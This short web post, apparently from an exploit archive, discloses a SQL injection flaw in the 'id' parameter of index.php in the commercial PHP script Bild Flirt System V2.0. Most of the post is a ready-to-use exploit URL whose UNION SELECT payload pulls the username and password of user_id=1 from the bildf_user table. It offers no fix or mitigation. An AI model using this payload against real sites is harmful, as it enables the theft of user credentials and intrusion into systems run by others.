Home / os / winme

Bild Flirt System V2.0 index.php (id) SQL Injection Vulnerab

Posted on 07 March 2010

================================================================= Bild Flirt System V2.0 index.php (id) SQL Injection Vulnerability ================================================================= ----------------------------Information------------------------------------------------ +Name : Bild Flirt System V2.0 index.php (id) SQL Injection +Autor : Easy Laster +Date : 07.03.2010 +Script : Bild Flirt System V2.0 +Price : 14,95 euro +Language :PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://server/demo/index.php?id= +Exploitable : http://server/demo/index.php?id=-111111111+union+select+concat (name,0x3a,passwort)+from+bildf_user+where+user_id=1# ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]

 

TOP